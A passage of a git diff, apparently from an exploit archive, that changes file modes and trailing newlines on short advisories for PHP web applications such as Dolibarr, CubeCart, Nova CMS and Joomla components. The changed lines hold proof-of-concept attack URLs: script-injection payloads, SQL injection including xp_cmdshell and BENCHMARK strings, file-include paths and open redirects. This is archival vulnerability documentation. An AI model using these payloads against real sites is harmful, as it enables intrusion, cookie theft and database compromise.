newline at end of file +limit=200&offset=0&sort=active&order=asc&other=&filter=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22VulnerabilityLab%22%29%20%3C \ No newline at end of file diff --git a/platforms/php/webapps/3667.txt b/platforms/php/webapps/3667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36671.txt b/platforms/php/webapps/36671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36674.txt b/platforms/php/webapps/36674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36675.txt b/platforms/php/webapps/36675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36676.html b/platforms/php/webapps/36676.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36677.txt b/platforms/php/webapps/36677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3668.txt b/platforms/php/webapps/3668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36683.txt b/platforms/php/webapps/36683.txt old mode 100755 new mode 100644 index b738a2ece..4958733e2 --- a/platforms/php/webapps/36683.txt +++ b/platforms/php/webapps/36683.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected. -http://www.example.com/adherents/fiche.php?rowid=-1%27 \ No newline at end of file +http://www.example.com/adherents/fiche.php?rowid=-1%27 \ No newline at end of file diff --git a/platforms/php/webapps/36685.txt b/platforms/php/webapps/36685.txt old mode 100755 new mode 100644 index 193f2fd7f..557678104 --- a/platforms/php/webapps/36685.txt +++ b/platforms/php/webapps/36685.txt @@ -7,4 +7,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. CubeCart 3.0.20 is vulnerable; other versions may also be affected. http://www.example.com/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D -http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D \ No newline at end of file +http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D \ No newline at end of file diff --git a/platforms/php/webapps/36686.txt b/platforms/php/webapps/36686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36687.txt b/platforms/php/webapps/36687.txt old mode 100755 new mode 100644 index a3dd84da8..2a7556fc4 --- a/platforms/php/webapps/36687.txt +++ b/platforms/php/webapps/36687.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. CubeCart 3.0.20 is vulnerable; other versions may also be affected. -http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es \ No newline at end of file +http://www.example.com/cube3.0.20/switch.php?r=//yehg.net/&lang=es \ No newline at end of file diff --git a/platforms/php/webapps/36688.html b/platforms/php/webapps/36688.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3669.txt b/platforms/php/webapps/3669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36691.txt b/platforms/php/webapps/36691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36693.txt b/platforms/php/webapps/36693.txt old mode 100755 new mode 100644 index 796799f9a..16d8f41d7 --- a/platforms/php/webapps/36693.txt +++ b/platforms/php/webapps/36693.txt @@ -4,4 +4,4 @@ RabbitWiki is prone to a cross-site scripting vulnerability because it fails to An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E \ No newline at end of file +http://www.example.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36694.txt b/platforms/php/webapps/36694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36695.txt b/platforms/php/webapps/36695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36696.txt b/platforms/php/webapps/36696.txt old mode 100755 new mode 100644 index 8ffef07fd..f71d85b87 --- a/platforms/php/webapps/36696.txt +++ b/platforms/php/webapps/36696.txt @@ -4,4 +4,4 @@ Nova CMS is prone to multiple remote file-include vulnerabilities because the ap Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L] \ No newline at end of file +http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/36697.txt b/platforms/php/webapps/36697.txt old mode 100755 new mode 100644 index 544fad495..088b72c77 --- a/platforms/php/webapps/36697.txt +++ b/platforms/php/webapps/36697.txt @@ -4,4 +4,4 @@ Nova CMS is prone to multiple remote file-include vulnerabilities because the ap Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L] \ No newline at end of file +http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/36698.txt b/platforms/php/webapps/36698.txt old mode 100755 new mode 100644 index d9e59d6be..152f96a39 --- a/platforms/php/webapps/36698.txt +++ b/platforms/php/webapps/36698.txt @@ -4,4 +4,4 @@ Nova CMS is prone to multiple remote file-include vulnerabilities because the ap Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L] \ No newline at end of file +http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/36699.txt b/platforms/php/webapps/36699.txt old mode 100755 new mode 100644 index 519aec50f..ebe48fcab --- a/platforms/php/webapps/36699.txt +++ b/platforms/php/webapps/36699.txt @@ -4,4 +4,4 @@ Nova CMS is prone to multiple remote file-include vulnerabilities because the ap Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L] \ No newline at end of file +http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/3670.txt b/platforms/php/webapps/3670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36702.txt b/platforms/php/webapps/36702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36703.txt b/platforms/php/webapps/36703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36704.txt b/platforms/php/webapps/36704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36705.txt b/platforms/php/webapps/36705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36706.txt b/platforms/php/webapps/36706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36707.txt b/platforms/php/webapps/36707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36708.txt b/platforms/php/webapps/36708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36709.txt b/platforms/php/webapps/36709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3671.php b/platforms/php/webapps/3671.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36710.txt b/platforms/php/webapps/36710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36711.txt b/platforms/php/webapps/36711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36712.txt b/platforms/php/webapps/36712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36713.txt b/platforms/php/webapps/36713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36714.txt b/platforms/php/webapps/36714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36715.txt b/platforms/php/webapps/36715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36716.txt b/platforms/php/webapps/36716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36717.txt b/platforms/php/webapps/36717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36718.txt b/platforms/php/webapps/36718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36719.txt b/platforms/php/webapps/36719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36720.txt b/platforms/php/webapps/36720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36721.txt b/platforms/php/webapps/36721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36722.txt b/platforms/php/webapps/36722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36723.txt b/platforms/php/webapps/36723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36724.txt b/platforms/php/webapps/36724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36725.txt b/platforms/php/webapps/36725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36726.txt b/platforms/php/webapps/36726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36727.txt b/platforms/php/webapps/36727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36728.txt b/platforms/php/webapps/36728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36729.txt b/platforms/php/webapps/36729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3673.txt b/platforms/php/webapps/3673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36730.txt b/platforms/php/webapps/36730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36731.txt b/platforms/php/webapps/36731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36732.txt b/platforms/php/webapps/36732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36733.txt b/platforms/php/webapps/36733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36735.txt b/platforms/php/webapps/36735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36736.txt b/platforms/php/webapps/36736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36738.txt b/platforms/php/webapps/36738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36751.txt b/platforms/php/webapps/36751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36752.txt b/platforms/php/webapps/36752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36753.txt b/platforms/php/webapps/36753.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36754.txt b/platforms/php/webapps/36754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36755.txt b/platforms/php/webapps/36755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36757.txt b/platforms/php/webapps/36757.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36758.txt b/platforms/php/webapps/36758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36759.txt b/platforms/php/webapps/36759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3676.txt b/platforms/php/webapps/3676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36760.txt b/platforms/php/webapps/36760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36761.txt b/platforms/php/webapps/36761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36762.txt b/platforms/php/webapps/36762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36763.txt b/platforms/php/webapps/36763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36764.txt b/platforms/php/webapps/36764.txt old mode 100755 new mode 100644 index cc85f3c0e..fd7f26d69 --- a/platforms/php/webapps/36764.txt +++ b/platforms/php/webapps/36764.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code can run in the context of the affected br SMW+ 1.5.6 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/Special:FormEdit?target=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F&categories=Calendar+ \ No newline at end of file +http://www.example.com/index.php/Special:FormEdit?target=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F&categories=Calendar+ \ No newline at end of file diff --git a/platforms/php/webapps/36765.txt b/platforms/php/webapps/36765.txt old mode 100755 new mode 100644 index 1fa760de5..6d3fba9ad --- a/platforms/php/webapps/36765.txt +++ b/platforms/php/webapps/36765.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica pfile 1.02 is vulnerable; other versions may also be affected. -http://www.example.compfile/kommentar.php?filecat=[xss]&fileid=0 \ No newline at end of file +http://www.example.compfile/kommentar.php?filecat=[xss]&fileid=0 \ No newline at end of file diff --git a/platforms/php/webapps/36766.txt b/platforms/php/webapps/36766.txt old mode 100755 new mode 100644 index 7bc6a2a0e..02fdd2927 --- a/platforms/php/webapps/36766.txt +++ b/platforms/php/webapps/36766.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica pfile 1.02 is vulnerable; other versions may also be affected. -http://www.example.com/pfile/file.php?eintrag=0&filecat=0&id=%24%7[xql] \ No newline at end of file +http://www.example.com/pfile/file.php?eintrag=0&filecat=0&id=%24%7[xql] \ No newline at end of file diff --git a/platforms/php/webapps/36768.txt b/platforms/php/webapps/36768.txt old mode 100755 new mode 100644 index 1475f999b..aa6e8efc7 --- a/platforms/php/webapps/36768.txt +++ b/platforms/php/webapps/36768.txt @@ -4,4 +4,4 @@ ProWiki is prone to a cross-site scripting vulnerability because it fails to suf An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/wiki4d/wiki.cgi?action=browse&id=[XSS] \ No newline at end of file +http://www.example.com/wiki4d/wiki.cgi?action=browse&id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36769.txt b/platforms/php/webapps/36769.txt old mode 100755 new mode 100644 index 9ec66dd05..fa079e67b --- a/platforms/php/webapps/36769.txt +++ b/platforms/php/webapps/36769.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. - http://www.example.com/prospects.php?team=[SQLi]' \ No newline at end of file + http://www.example.com/prospects.php?team=[SQLi]' \ No newline at end of file diff --git a/platforms/php/webapps/3677.txt b/platforms/php/webapps/3677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36770.txt b/platforms/php/webapps/36770.txt old mode 100755 new mode 100644 index de2d31fd7..0e2a19828 --- a/platforms/php/webapps/36770.txt +++ b/platforms/php/webapps/36770.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. -http://www.example.com/prospect.php?team=[SQLi]' \ No newline at end of file +http://www.example.com/prospect.php?team=[SQLi]' \ No newline at end of file diff --git a/platforms/php/webapps/36771.txt b/platforms/php/webapps/36771.txt old mode 100755 new mode 100644 index 89c127ca3..e0e713bc3 --- a/platforms/php/webapps/36771.txt +++ b/platforms/php/webapps/36771.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. -http://www.example.com/team.php?team=[SQLi]' \ No newline at end of file +http://www.example.com/team.php?team=[SQLi]' \ No newline at end of file diff --git a/platforms/php/webapps/36774.txt b/platforms/php/webapps/36774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36777.txt b/platforms/php/webapps/36777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3678.php b/platforms/php/webapps/3678.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36784.txt b/platforms/php/webapps/36784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36785.txt b/platforms/php/webapps/36785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36786.txt b/platforms/php/webapps/36786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36787.txt b/platforms/php/webapps/36787.txt old mode 100755 new mode 100644 index e2034717f..ec2d72ac1 --- a/platforms/php/webapps/36787.txt +++ b/platforms/php/webapps/36787.txt @@ -11,4 +11,4 @@ Exploiting these issues could allow an attacker to execute arbitrary script and LEPTON 1.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/admins/login/forgot/index.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E \ No newline at end of file +http://www.example.com/admins/login/forgot/index.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E \ No newline at end of file diff --git a/platforms/php/webapps/3679.php b/platforms/php/webapps/3679.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36790.txt b/platforms/php/webapps/36790.txt old mode 100755 new mode 100644 index 5b8dc9ccd..d0f5e554a --- a/platforms/php/webapps/36790.txt +++ b/platforms/php/webapps/36790.txt @@ -4,4 +4,4 @@ Tube Ace is prone to a cross-site scripting vulnerability because it fails to pr An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel= \ No newline at end of file +http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%22pwned%22%29%3C/script%3E&channel= \ No newline at end of file diff --git a/platforms/php/webapps/36791.txt b/platforms/php/webapps/36791.txt old mode 100755 new mode 100644 index cf85c64b2..9bed7a322 --- a/platforms/php/webapps/36791.txt +++ b/platforms/php/webapps/36791.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a CMS Faethon 1.3.4 is vulnerable; other versions may also be affected. http://www.example.com/articles.php?by_author=[SQL] -http://www.example.com/article.php?id=[SQL] \ No newline at end of file +http://www.example.com/article.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36792.txt b/platforms/php/webapps/36792.txt old mode 100755 new mode 100644 index 766275287..33ae7f8a4 --- a/platforms/php/webapps/36792.txt +++ b/platforms/php/webapps/36792.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and execute local scrip Pandora FMS 4.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/[ Path ]/index.php?sec=services&sec2=[FILE INCLUDE VULNERABILITY!] \ No newline at end of file +http://www.example.com/[ Path ]/index.php?sec=services&sec2=[FILE INCLUDE VULNERABILITY!] \ No newline at end of file diff --git a/platforms/php/webapps/36793.txt b/platforms/php/webapps/36793.txt old mode 100755 new mode 100644 index f328853cc..5333cc8c6 --- a/platforms/php/webapps/36793.txt +++ b/platforms/php/webapps/36793.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ButorWiki 3.0.0 is vulnerable; other versions may also be affected. -http://www.example.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E \ No newline at end of file +http://www.example.com/sso/signin?service=%22%22%3E%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36800.txt b/platforms/php/webapps/36800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36801.txt b/platforms/php/webapps/36801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36802.txt b/platforms/php/webapps/36802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36805.txt b/platforms/php/webapps/36805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36807.txt b/platforms/php/webapps/36807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3681.txt b/platforms/php/webapps/3681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36816.php b/platforms/php/webapps/36816.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36818.php b/platforms/php/webapps/36818.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36821.txt b/platforms/php/webapps/36821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36823.txt b/platforms/php/webapps/36823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36824.txt b/platforms/php/webapps/36824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36830.txt b/platforms/php/webapps/36830.txt old mode 100755 new mode 100644 index a31018896..e8c001a97 --- a/platforms/php/webapps/36830.txt +++ b/platforms/php/webapps/36830.txt @@ -4,4 +4,4 @@ Impulsio CMS is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?id=[SQL] \ No newline at end of file +http://www.example.com/index.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36834.txt b/platforms/php/webapps/36834.txt old mode 100755 new mode 100644 index 7cf662dcd..9147844b1 --- a/platforms/php/webapps/36834.txt +++ b/platforms/php/webapps/36834.txt @@ -4,4 +4,4 @@ The X-Shop component for Joomla! is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd=' \ No newline at end of file +http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd=' \ No newline at end of file diff --git a/platforms/php/webapps/36835.txt b/platforms/php/webapps/36835.txt old mode 100755 new mode 100644 index eed6d2541..2b1ac3adc --- a/platforms/php/webapps/36835.txt +++ b/platforms/php/webapps/36835.txt @@ -4,4 +4,4 @@ The Xcomp component for Joomla! is prone to a local file-include vulnerability b An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. -http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00 \ No newline at end of file +http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/36844.txt b/platforms/php/webapps/36844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36848.txt b/platforms/php/webapps/36848.txt old mode 100755 new mode 100644 index ade000314..5382ace90 --- a/platforms/php/webapps/36848.txt +++ b/platforms/php/webapps/36848.txt @@ -4,4 +4,4 @@ Tiki Wiki CMS Groupware is prone to a URI-redirection vulnerability because the A successful exploit may aid in phishing attacks; other attacks are possible. -http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com \ No newline at end of file +http://www.example.com/tiki-featured_link.php?type=f&url=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/36849.txt b/platforms/php/webapps/36849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3685.txt b/platforms/php/webapps/3685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36850.txt b/platforms/php/webapps/36850.txt old mode 100755 new mode 100644 index da6d27b18..22bc89496 --- a/platforms/php/webapps/36850.txt +++ b/platforms/php/webapps/36850.txt @@ -9,4 +9,4 @@ VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other vers http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+ -http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+ \ No newline at end of file +http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+ \ No newline at end of file diff --git a/platforms/php/webapps/36851.txt b/platforms/php/webapps/36851.txt old mode 100755 new mode 100644 index 288862172..58ef5c6f6 --- a/platforms/php/webapps/36851.txt +++ b/platforms/php/webapps/36851.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to execute arbitrary script on t http://www.example.com/fup [id parameter] http://www.example.com/fup [to parameter] -http://www.example.com/fup [from parameter] \ No newline at end of file +http://www.example.com/fup [from parameter] \ No newline at end of file diff --git a/platforms/php/webapps/36852.txt b/platforms/php/webapps/36852.txt old mode 100755 new mode 100644 index 2bea41bdf..82182017d --- a/platforms/php/webapps/36852.txt +++ b/platforms/php/webapps/36852.txt @@ -21,4 +21,4 @@ OR 1=1 http://www.example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://www.example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND -5912=BENCHMARK(5000000,MD5(1)) \ No newline at end of file +5912=BENCHMARK(5000000,MD5(1)) \ No newline at end of file diff --git a/platforms/php/webapps/36853.txt b/platforms/php/webapps/36853.txt old mode 100755 new mode 100644 index 6330ca3cf..3000a5168 --- a/platforms/php/webapps/36853.txt +++ b/platforms/php/webapps/36853.txt @@ -8,4 +8,4 @@ Dolphin 7.0.7 and prior versions are vulnerable. http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script> http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script> -http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script> \ No newline at end of file +http://www.example.com/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/36854.txt b/platforms/php/webapps/36854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36856.txt b/platforms/php/webapps/36856.txt old mode 100755 new mode 100644 index c2e028a25..ee54de6dd --- a/platforms/php/webapps/36856.txt +++ b/platforms/php/webapps/36856.txt @@ -4,4 +4,4 @@ The 'com_xvs' component for Joomla! is prone to a local file-include vulnerabili An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00 \ No newline at end of file +http://www.example.com/index.php?option=com_xvs&controller=../../[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/3686.txt b/platforms/php/webapps/3686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36860.txt b/platforms/php/webapps/36860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36862.txt b/platforms/php/webapps/36862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36863.txt b/platforms/php/webapps/36863.txt old mode 100755 new mode 100644 index d4f4509bf..a80d86ab9 --- a/platforms/php/webapps/36863.txt +++ b/platforms/php/webapps/36863.txt @@ -5,4 +5,4 @@ The Machine component for Joomla! is prone to multiple SQL-injection vulnerabili Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_machine&view=machine&Itemid=[SQL Injection] -http://www.example.com/index.php?option=com_machine&view=machine&Itemid=xxx&idMacchina=[SQL Injection] \ No newline at end of file +http://www.example.com/index.php?option=com_machine&view=machine&Itemid=xxx&idMacchina=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/36867.txt b/platforms/php/webapps/36867.txt old mode 100755 new mode 100644 index 1369d4d85..1b7d78db4 --- a/platforms/php/webapps/36867.txt +++ b/platforms/php/webapps/36867.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Dragonfly 9.3.3.0 is vulnerable; other versions may be affected. -http://www.example.com/index.php?name=coppermine&file=thumbnails&meta=lastup%22%3E%3CsCrIpT%3Ealert%2852128%29%3C%2fsCrIpT%3E&cat=0 \ No newline at end of file +http://www.example.com/index.php?name=coppermine&file=thumbnails&meta=lastup%22%3E%3CsCrIpT%3Ealert%2852128%29%3C%2fsCrIpT%3E&cat=0 \ No newline at end of file diff --git a/platforms/php/webapps/3687.txt b/platforms/php/webapps/3687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36870.txt b/platforms/php/webapps/36870.txt old mode 100755 new mode 100644 index 56a8b3552..d379572d8 --- a/platforms/php/webapps/36870.txt +++ b/platforms/php/webapps/36870.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ContentLion Alpha 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script> \ No newline at end of file +http://www.example.com/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script> \ No newline at end of file diff --git a/platforms/php/webapps/36873.txt b/platforms/php/webapps/36873.txt old mode 100755 new mode 100644 index c19bb8454..a475611f3 --- a/platforms/php/webapps/36873.txt +++ b/platforms/php/webapps/36873.txt @@ -6,4 +6,4 @@ Exploiting the issues can allow an attacker to obtain sensitive information that Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected. -http://www.example.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!] \ No newline at end of file +http://www.example.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!] \ No newline at end of file diff --git a/platforms/php/webapps/36874.txt b/platforms/php/webapps/36874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36875.txt b/platforms/php/webapps/36875.txt old mode 100755 new mode 100644 diff --git 